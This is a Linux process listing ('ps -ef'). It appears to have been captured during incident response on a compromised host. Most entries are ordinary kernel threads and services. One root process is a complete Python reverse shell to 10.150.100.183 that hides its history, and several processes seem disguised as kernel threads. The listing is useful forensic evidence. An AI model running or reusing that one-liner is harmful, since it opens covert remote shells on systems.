UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Oct23 ?        00:00:18 /sbin/init
root         2     0  0 Oct23 ?        00:00:00 [kthreadd]
root         3     2  0 Oct23 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Oct23 ?        00:00:00 [kworker/0:0H]
root         7     2  0 Oct23 ?        00:00:07 [rcu_sched]
root         8     2  0 Oct23 ?        00:00:03 [rcuos/0]
root         9     2  0 Oct23 ?        00:00:03 [rcuos/1]
root        10     2  0 Oct23 ?        00:00:04 [rcuos/2]
root        11     2  0 Oct23 ?        00:00:03 [rcuos/3]
root        12     2  0 Oct23 ?        00:00:04 [rcuos/4]
root        13     2  0 Oct23 ?        00:00:03 [rcuos/5]
root        14     2  0 Oct23 ?        00:00:03 [rcuos/6]
root        15     2  0 Oct23 ?        00:00:03 [rcuos/7]
root        16     2  0 Oct23 ?        00:00:00 [rcu_bh]
root        17     2  0 Oct23 ?        00:00:00 [rcuob/0]
root        18     2  0 Oct23 ?        00:00:00 [rcuob/1]
root        19     2  0 Oct23 ?        00:00:00 [rcuob/2]
root        20     2  0 Oct23 ?        00:00:00 [rcuob/3]
root        21     2  0 Oct23 ?        00:00:00 [rcuob/4]
root        22     2  0 Oct23 ?        00:00:00 [rcuob/5]
root        23     2  0 Oct23 ?        00:00:00 [rcuob/6]
root        24     2  0 Oct23 ?        00:00:00 [rcuob/7]
root        25     2  0 Oct23 ?        00:00:00 [migration/0]
root        26     2  0 Oct23 ?        00:00:00 [watchdog/0]
root        27     2  0 Oct23 ?        00:00:00 [watchdog/1]
root        28     2  0 Oct23 ?        00:00:00 [migration/1]
root        29     2  0 Oct23 ?        00:00:00 [ksoftirqd/1]
root        31     2  0 Oct23 ?        00:00:00 [kworker/1:0H]
root        32     2  0 Oct23 ?        00:00:00 [watchdog/2]
root        33     2  0 Oct23 ?        00:00:00 [migration/2]
root        34     2  0 Oct23 ?        00:00:00 [ksoftirqd/2]
root        35     2  0 Oct23 ?        00:00:00 [kworker/2:0]
root        36     2  0 Oct23 ?        00:00:00 [kworker/2:0H]
root        37     2  0 Oct23 ?        00:00:00 [watchdog/3]
root        38     2  0 Oct23 ?        00:00:00 [migration/3]
root        39     2  0 Oct23 ?        00:00:00 [ksoftirqd/3]
root        40     2  0 Oct23 ?        00:00:00 [kworker/3:0]
root        41     2  0 Oct23 ?        00:00:00 [kworker/3:0H]
root        42     2  0 Oct23 ?        00:00:00 [watchdog/4]
root        43     2  0 Oct23 ?        00:00:00 [migration/4]
root        44     2  0 Oct23 ?        00:00:00 [ksoftirqd/4]
root        46     2  0 Oct23 ?        00:00:00 [kworker/4:0H]
root        47     2  0 Oct23 ?        00:00:00 [watchdog/5]
root        48     2  0 Oct23 ?        00:00:00 [migration/5]
root        49     2  0 Oct23 ?        00:00:00 [ksoftirqd/5]
root        50     2  0 Oct23 ?        00:00:00 [kworker/5:0]
root        51     2  0 Oct23 ?        00:00:00 [kworker/5:0H]
root        52     2  0 Oct23 ?        00:00:00 [watchdog/6]
root        53     2  0 Oct23 ?        00:00:00 [migration/6]
root        54     2  0 Oct23 ?        00:00:00 [ksoftirqd/6]
root        55     2  0 Oct23 ?        00:00:00 [kworker/6:0]
root        56     2  0 Oct23 ?        00:00:00 [kworker/6:0H]
root        57     2  0 Oct23 ?        00:00:00 [watchdog/7]
root        58     2  0 Oct23 ?        00:00:00 [migration/7]
root        59     2  0 Oct23 ?        00:00:00 [ksoftirqd/7]
root        60     2  0 Oct23 ?        00:00:00 [kworker/7:0]
root        61     2  0 Oct23 ?        00:00:00 [kworker/7:0H]
root        62     2  0 Oct23 ?        00:00:00 [khelper]
root        63     2  0 Oct23 ?        00:00:00 [kdevtmpfs]
root        64     2  0 Oct23 ?        00:00:00 [netns]
root        65     2  0 Oct23 ?        00:00:00 [writeback]
root        66     2  0 Oct23 ?        00:00:00 [kintegrityd]
root        67     2  0 Oct23 ?        00:00:00 [bioset]
root        68     2  0 Oct23 ?        00:00:00 [kworker/u17:0]
root        69     2  0 Oct23 ?        00:00:00 [kblockd]
root        70     2  0 Oct23 ?        00:00:00 [ata_sff]
root        71     2  0 Oct23 ?        00:00:00 [khubd]
root        72     2  0 Oct23 ?        00:00:00 [md]
root        73     2  0 Oct23 ?        00:00:00 [devfreq_wq]
root        74     2  0 Oct23 ?        00:00:12 [kworker/0:1]
root        75     2  0 Oct23 ?        00:00:01 [kworker/1:1]
root        76     2  0 Oct23 ?        00:00:01 [kworker/2:1]
root        77     2  0 Oct23 ?        00:00:02 [kworker/3:1]
root        78     2  0 Oct23 ?        00:00:08 [kworker/4:1]
root        79     2  0 Oct23 ?        00:00:01 [kworker/5:1]
root        80     2  0 Oct23 ?        00:00:01 [kworker/6:1]
root        81     2  0 Oct23 ?        00:00:01 [kworker/7:1]
root        82     2  0 Oct23 ?        00:00:00 [khungtaskd]
root        83     2  0 Oct23 ?        00:00:00 [kswapd0]
root        84     2  0 Oct23 ?        00:00:00 [ksmd]
root        85     2  0 Oct23 ?        00:00:00 [khugepaged]
root        86     2  0 Oct23 ?        00:00:00 [fsnotify_mark]
root        87     2  0 Oct23 ?        00:00:00 [ecryptfs-kthrea]
root        88     2  0 Oct23 ?        00:00:00 [crypto]
root       100     2  0 Oct23 ?        00:00:00 [kthrotld]
root       102     2  0 Oct23 ?        00:01:21 [vballoon]
root       103     2  0 Oct23 ?        00:00:00 [scsi_eh_0]
root       104     2  0 Oct23 ?        00:00:00 [scsi_eh_1]
root       125     2  0 Oct23 ?        00:00:00 [deferwq]
root       126     2  0 Oct23 ?        00:00:00 [charger_manager]
root       190     2  0 Oct23 ?        00:00:00 [scsi_eh_2]
root       196     2  0 Oct23 ?        00:00:00 [kdmflush]
root       197     2  0 Oct23 ?        00:00:00 [bioset]
root       199     2  0 Oct23 ?        00:00:00 [kdmflush]
root       200     2  0 Oct23 ?        00:00:00 [bioset]
root       216     2  0 Oct23 ?        00:00:00 [kworker/u17:1]
root       217     2  0 Oct23 ?        00:00:00 [jbd2/dm-0-8]
root       218     2  0 Oct23 ?        00:00:00 [ext4-rsv-conver]
root       354     1  0 Oct23 ?        00:00:00 upstart-udev-bridge --daemon
root       359     1  0 Oct23 ?        00:00:00 /lib/systemd/systemd-udevd --daemon
root       485     2  0 Oct23 ?        00:00:00 [kpsmoused]
root       497     2  0 Oct23 ?        00:00:00 [kworker/4:2]
root       552     1  0 Oct23 ?        00:00:00 upstart-socket-bridge --daemon
root       560     2  0 Oct23 ?        00:00:00 [ttm_swap]
root       629     1  0 Oct23 ?        00:00:00 [scsi_eh_2]    
root       703     2  0 Oct23 ?        00:00:00 [ext4-rsv-conver]
message+   767     1  0 Oct23 ?        00:00:00 dbus-daemon --system --fork
syslog     832     1  0 Oct23 ?        00:00:21 rsyslogd
root       884     1  0 Oct23 ?        00:00:00 upstart-file-bridge --daemon
root       896     1  0 Oct23 ?        00:00:00 /lib/systemd/systemd-logind
root       976     1  0 Oct23 tty4     00:00:00 /sbin/getty -8 38400 tty4
root       979     1  0 Oct23 tty5     00:00:00 /sbin/getty -8 38400 tty5
root       984     1  0 Oct23 tty2     00:00:00 /sbin/getty -8 38400 tty2
root       985     1  0 Oct23 tty3     00:00:00 /sbin/getty -8 38400 tty3
root       987     1  0 Oct23 tty6     00:00:00 /sbin/getty -8 38400 tty6
root      1004     1  0 Oct23 ?        00:00:00 /usr/sbin/sshd -D
root      1015     1  0 Oct23 ?        00:00:00 cron
root      1215     2  0 Oct23 ?        00:00:00 [kauditd]
root      1231     1  0 Oct23 ?        00:00:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket
root      1279     1  0 Oct23 ?        00:00:06 /usr/sbin/irqbalance
root      5209     2  0 16:40 ?        00:00:00 [kworker/u16:1]
root      5225   629  0 16:43 ?        00:00:00 /bin/sh
root      5271 14902  0 16:49 ?        00:00:00 [bioset]    
root      5324  1004  0 16:50 ?        00:00:00 sshd: voyeurs [priv]
root      5328     1  0 16:50 ?        00:00:00 python -c import os; import pty; import socket; lhost = '10.150.100.183'; lport = 64060; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/sh'); s.close();
voyeurs   5375  5324  0 16:50 ?        00:00:00 sshd: voyeurs@pts/1 
voyeurs   5456  5375  0 16:50 pts/1    00:00:00 /bin/sh -c sudo -H -S -n -u root /bin/sh -c 'echo BECOME-SUCCESS-ermskzezixndwssbkngwqygohjcfxzvp; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.4087899-201728319594717/AnsiballZ_command.py' && sleep 0
root      5457  5456  0 16:50 pts/1    00:00:00 sudo -H -S -n -u root /bin/sh -c echo BECOME-SUCCESS-ermskzezixndwssbkngwqygohjcfxzvp; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.4087899-201728319594717/AnsiballZ_command.py
root      5458  5457  0 16:50 pts/1    00:00:00 /bin/sh -c echo BECOME-SUCCESS-ermskzezixndwssbkngwqygohjcfxzvp; /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.4087899-201728319594717/AnsiballZ_command.py
root      5459  5458  0 16:50 pts/1    00:00:00 /usr/bin/python /home/voyeurs/.ansible/tmp/ansible-tmp-1572036665.4087899-201728319594717/AnsiballZ_command.py
root      5460  5459  0 16:50 pts/1    00:00:00 /bin/sh -c ps -ef
root      5461  5460  0 16:50 pts/1    00:00:00 ps -ef
root      9553     1  0 Oct23 ?        00:00:00 [flush-253:0]      
root     14902     1  0 14:58 ?        00:00:00 [bioset]    
root     15125  1004  0 15:07 ?        00:00:00 sshd: root@pts/0    
root     15179 15125  0 15:07 pts/0    00:00:00 -bash
root     15208     1  0 15:08 tty1     00:00:00 /bin/login --     
bind     23953     1  0 13:02 ?        00:00:03 /usr/sbin/named -u bind
root     24225 15208  0 15:42 tty1     00:00:00 -bash
root     24583     2  0 15:47 ?        00:00:00 [kworker/0:2]
root     24657     2  0 15:49 ?        00:00:00 [kworker/1:2]
root     27721     2  0 16:08 ?        00:00:00 [kworker/u16:0]
root     30677  1004  0 16:20 ?        00:00:00 sshd: voyeurs [priv]
voyeurs  30783 30677  0 16:20 ?        00:00:00 sshd: voyeurs@pts/3 
voyeurs  30784 30783  0 16:20 pts/3    00:00:00 -bash
root     30807 30784  0 16:20 pts/3    00:00:00 sudo -s
root     30808 30807  0 16:20 pts/3    00:00:00 /bin/bash
root     30941  1004  0 16:25 ?        00:00:00 sshd: voyeurs [priv]
voyeurs  30992 30941  0 16:25 ?        00:00:00 sshd: voyeurs@pts/5 
voyeurs  30993 30992  0 16:25 pts/5    00:00:00 -bash
root     31009 30993  0 16:25 pts/5    00:00:00 sudo -s
root     31010 31009  0 16:25 pts/5    00:00:00 /bin/bash
root     31028  1004  0 16:26 ?        00:00:00 sshd: voyeurs [priv]
voyeurs  31079 31028  0 16:26 ?        00:00:00 sshd: voyeurs@pts/6 
voyeurs  31080 31079  0 16:26 pts/6    00:00:00 -bash
root     31099 31080  0 16:27 pts/6    00:00:00 sudo su
root     31100 31099  0 16:27 pts/6    00:00:00 su
root     31101 31100  0 16:27 pts/6    00:00:00 bash